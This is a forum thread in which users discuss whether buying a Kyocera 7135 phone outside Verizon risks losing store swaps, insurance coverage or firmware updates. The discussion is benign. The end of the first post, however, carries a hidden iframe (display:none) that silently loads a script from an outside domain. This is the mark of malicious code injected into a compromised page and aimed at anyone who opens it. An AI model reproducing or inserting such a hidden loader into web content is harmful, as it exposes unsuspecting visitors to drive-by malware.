+ Reply to Thread

Thread: Only one risk

Only one risk

It appears to me that, assuming cost is not an issue, the only negative in buying through GetConnected (and activating on Verizon) versus waiting and buying from Verizon is the ability to "swap" out the phone at a Verizon store. I've had the 6035 for a couple of years and although I have had the insurance, on two separate occassions when the phone wasn't working perfectly I just brought it to a Verizon store and they gave me a new (probably refurbished) 6035. If you don't buy from Verizon you probably will not be able to do that, although after Verizon releases the phone it still may be possible if the techie fails to notice that the phone wasn't a Verizon released phone.

Other than the "phone swap" issue, I don't think there is any downside to buying from GetConnected. This evening I went into a Verizon store (a pretty significant store in NJ) and the store manager noted that there he iknows of no hardware issues and anything that is "fixed" as a result of teh Verizon testing should be able to be "fixed" on a phone purchased from GetConnected. He also indicated that in his opinion Verizon is real close to releasing. He noted that his store personnel have received training on the 7135 and that he thought it would be released either in January or February (although I don't think he had any inside information).<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

RMSko, ditto... this is my only concern as well...

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

I'm not concerned. I'll get insurance on the phone and just take it in if anything goes wrong. If they give me greif I'll complain about them taking my money the whole time. The insurance should cover the phone, no matter where you bought it.
    Sorry, but I no longer make 7135 headset adapters.

You are probably right not to take this kind of risk if don't have a back up and back out plan.

Personally, I'm not concerned in the least. I have 2 months and 3 weeks left on my Amex Buyers Projection. If this puppy gives me too many problems, I'll get a replacement or a refund and I'm back to my 2235+m505 for a while. 3 months from now, I have insurance at Verizon which may mean either a quick swap or a delay while waiting for a replacement. My insurance guy told me that I have a $250 deductible if anything happens without adding anything new to my homeowner's insurance (Yuk!). Since I've never had a claim in 10 years, there is no risk of being dropped if I choose to take the $250 loss.

My risks have been mitigated.

Beryl, u r deMan!

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

What about the risk that " We the users of the software, cant get the tools (KWPST) to update the firmware if necc'.
    Or... that getting the update(s) is like trying to smuggle a lit joint thru a customs?

Originally posted by WORBC
    Beryl, u r deMan!
    Er, maybe the de-WO-Man.

My verizon store made sure my 7135 had insurance turned on when they activated me today, just like with my 6035...
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by aka.bugle
    What about the risk that " We the users of the software, cant get the tools (KWPST) to update the firmware if necc'.
    Or... that getting the update(s) is like trying to smuggle a lit joint thru a customs?
    The manager at the Verizon store I went to said they would update the firmware as long as it's a Verizon activated phone. Did anyone hear anything differently? If this is not the case, it would be a major concern for any "Alltel" purchasers.

I would imagine Verizon would do anything for you within reason if you have a contract with them. They are after that money not the money selling handsets. The handset is just a means to an end for them.

Originally posted by richard
    I would imagine Verizon would do anything for you within reason if you have a contract with them. They are after that money not the money selling handsets. The handset is just a means to an end for them.
    I agree. They save on subsidies for customers who bring phones bought elsewhere. I wonder why Sprint doesn't allow this?

Plus, many did this for Sprint & Qwest 6035's who converted to Verizon.
    ~'kito
    pdaPhoneHome Moderator